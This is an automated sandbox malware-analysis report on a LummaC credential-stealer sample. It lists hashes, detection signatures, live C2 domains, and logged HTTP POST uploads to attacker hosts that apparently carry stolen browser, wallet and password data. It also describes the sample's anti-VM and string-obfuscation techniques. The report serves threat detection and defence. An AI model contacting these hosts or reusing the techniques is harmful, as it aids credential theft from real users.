Joe Sandbox Cloud Basic Analysis Report
Edit tour

Windows Analysis Report
Setupv.exe

Overview

General Information

Sample name:Setupv.exe
Analysis ID:1676533
MD5:a88651093c94d9006da8ccbc80535e29
SHA1:31208c84dd3066d4d0449c588e1614485156845e
SHA256:fc9adba0c5b7ac7700a7e904aecfffb41a53c9311f249dcbf5678707d10db7ea
Tags:exelummalummaclummastealerstealeruser-LuRisa798
Infos:

Detection

LummaC Stealer
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Tries to steal from password manager
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious

Process Tree

  • System is w10x64
  • Setupv.exe (PID: 7840 cmdline: "C:\Users\user\Desktop\Setupv.exe" MD5: A88651093C94D9006DA8CCBC80535E29)
  • cleanup

Malware Configuration

Threatname: LummaC

{
  "C2 url": [
    "transdataa.digital/xwpa",
    "geographys.run/eirq",
    "woodpeckersd.run/glsk",
    "tropiscbs.live/iuwxx",
    "cartograhphy.top/ixau",
    "biosphxere.digital/tqoa",
    "topographky.top/xlak",
    "climatologfy.top/kbud",
    "vigorbridgoe.top/banb"
  ],
  "Build id": "9b3bedb653f936be48e5e9e5aff9524e4bcff3a9368fb60c"
}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000003.1851653788.0000000002CE2000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
      Process Memory Space: Setupv.exe PID: 7840JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security

        Sigma Signatures

        No Sigma rule has matched

        Suricata Signatures

        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-04-28T19:34:28.895163+020020283713Unknown Traffic192.168.2.549695172.67.182.68443TCP
        2025-04-28T19:34:51.062891+020020283713Unknown Traffic192.168.2.54969823.52.218.12443TCP
        2025-04-28T19:34:52.111729+020020283713Unknown Traffic192.168.2.549699104.21.36.133443TCP
        2025-04-28T19:34:55.245027+020020283713Unknown Traffic192.168.2.549700104.21.36.133443TCP
        2025-04-28T19:34:56.620929+020020283713Unknown Traffic192.168.2.549701104.21.36.133443TCP
        2025-04-28T19:34:59.244166+020020283713Unknown Traffic192.168.2.549702104.21.36.133443TCP
        2025-04-28T19:35:01.243642+020020283713Unknown Traffic192.168.2.549703104.21.36.133443TCP
        2025-04-28T19:35:04.153586+020020283713Unknown Traffic192.168.2.549704104.21.36.133443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-04-28T19:34:49.494621+020020618491Domain Observed Used for C2 Detected192.168.2.5593281.1.1.153UDP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-04-28T19:34:49.338097+020020618511Domain Observed Used for C2 Detected192.168.2.5593811.1.1.153UDP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-04-28T19:34:50.084494+020020618071Domain Observed Used for C2 Detected192.168.2.5639211.1.1.153UDP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-04-28T19:34:48.826594+020020618531Domain Observed Used for C2 Detected192.168.2.5577281.1.1.153UDP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-04-28T19:34:49.655128+020020618571Domain Observed Used for C2 Detected192.168.2.5593711.1.1.153UDP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-04-28T19:34:49.176939+020020618591Domain Observed Used for C2 Detected192.168.2.5607151.1.1.153UDP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-04-28T19:34:50.242689+020020618611Domain Observed Used for C2 Detected192.168.2.5595761.1.1.153UDP

        Joe Sandbox Signatures

        • AV Detection
        • Cryptography
        • Compliance
        • Software Vulnerabilities
        • Networking
        • Key, Mouse, Clipboard, Microphone and Screen Capturing
        • System Summary
        • Data Obfuscation
        • Hooking and other Techniques for Hiding and Protection
        • Malware Analysis System Evasion
        • Anti Debugging
        • Language, Device and Operating System Detection
        • Lowering of HIPS / PFW / Operating System Security Settings
        • Stealing of Sensitive Information
        • Remote Access Functionality

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: https://cartograhphy.top:443/ixauaD(Avira URL Cloud: Label: malware
        Source: https://cartograhphy.top/ixau3Avira URL Cloud: Label: malware
        Source: https://biosphxere.digital/Avira URL Cloud: Label: malware
        Source: https://geographys.run/mAvira URL Cloud: Label: malware
        Source: https://biosphxere.digital/tqoaAvira URL Cloud: Label: malware
        Source: https://woodpeckersd.run/glskAvira URL Cloud: Label: malware
        Source: https://toptalentw.top:443/qenalAvira URL Cloud: Label: malware
        Source: https://topographky.top/l/Avira URL Cloud: Label: malware
        Source: https://toptalentw.top/qenaAvira URL Cloud: Label: malware
        Source: https://biosphxere.digital:443/tqoaAvira URL Cloud: Label: malware
        Source: https://vigorbridgoe.top/banb8Avira URL Cloud: Label: malware
        Source: https://toptalentw.top:443/qenazchhhv.default-release/key4.dbPKAvira URL Cloud: Label: malware
        Source: https://topographky.top/f.ms1&Avira URL Cloud: Label: malware
        Source: transdataa.digital/xwpaAvira URL Cloud: Label: malware
        Source: https://topographky.top/xlakoamAvira URL Cloud: Label: malware
        Source: https://woodpeckersd.run/Avira URL Cloud: Label: malware
        Source: https://tropiscbs.live/SAvira URL Cloud: Label: malware
        Source: https://transdataa.digital/Avira URL Cloud: Label: malware
        Source: https://tropiscbs.live/iuwxxAvira URL Cloud: Label: malware
        Source: 00000000.00000003.1851653788.0000000002CE2000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: LummaC {"C2 url": ["transdataa.digital/xwpa", "geographys.run/eirq", "woodpeckersd.run/glsk", "tropiscbs.live/iuwxx", "cartograhphy.top/ixau", "biosphxere.digital/tqoa", "topographky.top/xlak", "climatologfy.top/kbud", "vigorbridgoe.top/banb"], "Build id": "9b3bedb653f936be48e5e9e5aff9524e4bcff3a9368fb60c"}
        Source: Setupv.exeReversingLabs: Detection: 27%
        Source: Setupv.exeVirustotal: Detection: 27%Perma Link
        Source: 00000000.00000003.1851653788.0000000002CE2000.00000004.00000020.00020000.00000000.sdmpString decryptor: transdataa.digital/xwpa
        Source: 00000000.00000003.1851653788.0000000002CE2000.00000004.00000020.00020000.00000000.sdmpString decryptor: geographys.run/eirq
        Source: 00000000.00000003.1851653788.0000000002CE2000.00000004.00000020.00020000.00000000.sdmpString decryptor: woodpeckersd.run/glsk
        Source: 00000000.00000003.1851653788.0000000002CE2000.00000004.00000020.00020000.00000000.sdmpString decryptor: tropiscbs.live/iuwxx
        Source: 00000000.00000003.1851653788.0000000002CE2000.00000004.00000020.00020000.00000000.sdmpString decryptor: cartograhphy.top/ixau
        Source: 00000000.00000003.1851653788.0000000002CE2000.00000004.00000020.00020000.00000000.sdmpString decryptor: biosphxere.digital/tqoa
        Source: 00000000.00000003.1851653788.0000000002CE2000.00000004.00000020.00020000.00000000.sdmpString decryptor: topographky.top/xlak
        Source: 00000000.00000003.1851653788.0000000002CE2000.00000004.00000020.00020000.00000000.sdmpString decryptor: climatologfy.top/kbud
        Source: 00000000.00000003.1851653788.0000000002CE2000.00000004.00000020.00020000.00000000.sdmpString decryptor: vigorbridgoe.top/banb
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 0_3_02E2D060 CryptUnprotectData,0_3_02E2D060
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 0_3_02E2CCE4 CryptUnprotectData,0_3_02E2CCE4
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 0_3_02E2AD00 CryptUnprotectData,0_3_02E2AD00
        Source: Setupv.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
        Source: unknownHTTPS traffic detected: 172.67.182.68:443 -> 192.168.2.5:49695 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 23.52.218.12:443 -> 192.168.2.5:49698 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.36.133:443 -> 192.168.2.5:49699 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.36.133:443 -> 192.168.2.5:49700 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.36.133:443 -> 192.168.2.5:49701 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.36.133:443 -> 192.168.2.5:49702 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.36.133:443 -> 192.168.2.5:49703 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.36.133:443 -> 192.168.2.5:49704 version: TLS 1.2
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 2D5FAC64h0_3_02E21B31
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 4x nop then mov esi, ecx0_3_02E220F8
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 4x nop then cmp word ptr [edi+ebx], 0000h0_3_02E5B8B0
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 4x nop then xor eax, eax0_3_02E1F805
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+04h]0_3_02E3D910
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 98E38976h0_3_02E3D910
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 4x nop then lea esi, dword ptr [edx+ecx]0_3_02E3D910
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+20h]0_3_02E3DE80
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+78DB078Ah]0_3_02E5CFE0
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 5A3C2B61h0_3_02E21778
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 4x nop then mov word ptr [eax], dx0_3_02E2B4FD
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 460854CDh0_3_02E5C4C0
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-76h]0_3_02E2EC24
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-00000086h]0_3_02E2EC24
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 4x nop then cmp word ptr [edi+eax+02h], 0000h0_3_02E32260
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+75442A6Ah]0_3_02E523D0
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 4x nop then movzx edi, byte ptr [ecx+eax-27F67330h]0_3_02E3AB96
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 4x nop then movzx edi, byte ptr [ecx+eax-27F67330h]0_3_02E3AB96
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+6F2F5F94h]0_3_02E1CB70
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 4x nop then movzx ebx, byte ptr [eax+esi]0_3_02E1CB70
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx+04h]0_3_02E55B70
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-54h]0_3_02E36340
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 4x nop then movsx eax, byte ptr [esi+ecx]0_3_02E1B310
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax+1B95F13Eh]0_3_02E300E0
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 4x nop then movzx ecx, word ptr [ebx+eax]0_3_02E300E0
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 4x nop then movzx edi, byte ptr [esp+edx]0_3_02E300E0
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 4x nop then movzx ebx, byte ptr [esp+eax]0_3_02E300E0
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax+75442A6Ah]0_3_02E55080
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]0_3_02E1A070
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]0_3_02E1A070
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 4x nop then jmp eax0_3_02E21016
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+04h]0_3_02E599F0
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+78DB078Ah]0_3_02E5D180
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-74A91344h]0_3_02E55160
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax]0_3_02E5C150
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+78DB0786h]0_3_02E5C150
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 4x nop then movzx eax, word ptr [ecx]0_3_02E5C150
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+7902EEFAh]0_3_02E3DEA0
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 4x nop then push edi0_3_02E51E90
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+0Ch]0_3_02E34E50
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 8DD87000h0_3_02E5BE50
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 4x nop then movzx edx, byte ptr [esi+eax-0000008Eh]0_3_02E2BE24
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 4x nop then movzx edx, byte ptr [esi+eax-0000008Eh]0_3_02E2C7EC
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 4x nop then mov byte ptr [esi], cl0_3_02E44FC4
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-5EB489ACh]0_3_02E59FB0
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 6D603FE4h0_3_02E59FB0
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 4x nop then mov edi, ecx0_3_02E59FB0
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+1Ch]0_3_02E40F90
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-267DEF53h]0_3_02E40F90
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 4x nop then cmp word ptr [eax+ecx+02h], 0000h0_3_02E31F74
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx+08h]0_3_02E31F74
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 4x nop then movsx ecx, byte ptr [esi+eax]0_3_02E29720
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 4x nop then mov word ptr [edx], ax0_3_02E1D730
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 4x nop then movzx edx, word ptr [eax]0_3_02E20733
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax+75442A6Ah]0_3_02E54F00
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 4x nop then mov dword ptr [esi+0Ch], ecx0_3_02E2DCD0
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 4x nop then mov word ptr [ecx], dx0_3_02E2A4AA
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 4x nop then mov ebp, eax0_3_02E184B0
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 4x nop then movzx ebx, byte ptr [esi+01h]0_3_02E11C70
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 4x nop then mov eax, dword ptr [esp+30h]0_3_02E525E0
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ebp+02h]0_3_02E36DC0
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 4x nop then mov esi, edx0_3_02E1F548
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 4x nop then mov word ptr [eax], di0_3_02E31D23
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 4x nop then movzx edx, byte ptr [esp+ebx-1FD35320h]0_3_02E3A52E

        Networking

        barindex
        Source: Network trafficSuricata IDS: 2061859 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tropiscbs .live) : 192.168.2.5:60715 -> 1.1.1.1:53
        Source: Network trafficSuricata IDS: 2061857 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (topographky .top) : 192.168.2.5:59371 -> 1.1.1.1:53
        Source: Network trafficSuricata IDS: 2061851 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cartograhphy .top) : 192.168.2.5:59381 -> 1.1.1.1:53
        Source: Network trafficSuricata IDS: 2061849 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (biosphxere .digital) : 192.168.2.5:59328 -> 1.1.1.1:53
        Source: Network trafficSuricata IDS: 2061861 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (vigorbridgoe .top) : 192.168.2.5:59576 -> 1.1.1.1:53
        Source: Network trafficSuricata IDS: 2061807 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (climatologfy .top) : 192.168.2.5:63921 -> 1.1.1.1:53
        Source: Network trafficSuricata IDS: 2061853 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (geographys .run) : 192.168.2.5:57728 -> 1.1.1.1:53
        Source: Malware configuration extractorURLs: transdataa.digital/xwpa
        Source: Malware configuration extractorURLs: geographys.run/eirq
        Source: Malware configuration extractorURLs: woodpeckersd.run/glsk
        Source: Malware configuration extractorURLs: tropiscbs.live/iuwxx
        Source: Malware configuration extractorURLs: cartograhphy.top/ixau
        Source: Malware configuration extractorURLs: biosphxere.digital/tqoa
        Source: Malware configuration extractorURLs: topographky.top/xlak
        Source: Malware configuration extractorURLs: climatologfy.top/kbud
        Source: Malware configuration extractorURLs: vigorbridgoe.top/banb
        Source: global trafficHTTP traffic detected: GET /profiles/76561199845513035 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
        Source: Joe Sandbox ViewIP Address: 23.52.218.12 23.52.218.12
        Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
        Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49695 -> 172.67.182.68:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49698 -> 23.52.218.12:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49703 -> 104.21.36.133:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49702 -> 104.21.36.133:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49700 -> 104.21.36.133:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49699 -> 104.21.36.133:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49704 -> 104.21.36.133:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49701 -> 104.21.36.133:443
        Source: global trafficHTTP traffic detected: POST /xwpa HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 57Host: transdataa.digital
        Source: global trafficHTTP traffic detected: POST /qena HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 57Host: toptalentw.top
        Source: global trafficHTTP traffic detected: POST /qena HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=n2O6r5Alv1GWjGKnMfUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 14929Host: toptalentw.top
        Source: global trafficHTTP traffic detected: POST /qena HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=MjYU1bfK4GdCYGj81User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 15073Host: toptalentw.top
        Source: global trafficHTTP traffic detected: POST /qena HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=7tfr7jpx9ESjC6xCIUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 20562Host: toptalentw.top
        Source: global trafficHTTP traffic detected: POST /qena HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=M09Efv1f20zz1AhfYCvUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 2401Host: toptalentw.top
        Source: global trafficHTTP traffic detected: POST /qena HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=2I9UW0E70hbAbUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 590349Host: toptalentw.top
        Source: global trafficHTTP traffic detected: POST /qena HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 95Host: toptalentw.top
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /profiles/76561199845513035 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
        Source: Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://steamloopback.host https://store.steampowered.com/; equals www.youtube.com (Youtube)
        Source: Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://steamloopback.host https://store.steampowered.com/;X-Frame-OptionsSAMEORIGINPersistent-AuthWWW-AuthenticateAccept-EncodingVarysteamCountry=US%7Ccf72e8d7385b2d4d64dd054efa94cd8a; path=/; secure; HttpOnly; SameSite=Nonesessionid=7211436345a6db4b4f547bd8; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type35880Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveMon, 28 Apr 2025 17:34:51 GMTDateProxy-Connectionkeep-aliveConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
        Source: Setupv.exe, 00000000.00000003.1816496507.0000000000D02000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1818208188.0000000000D02000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1810483565.0000000000D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ h equals www.youtube.com (Youtube)
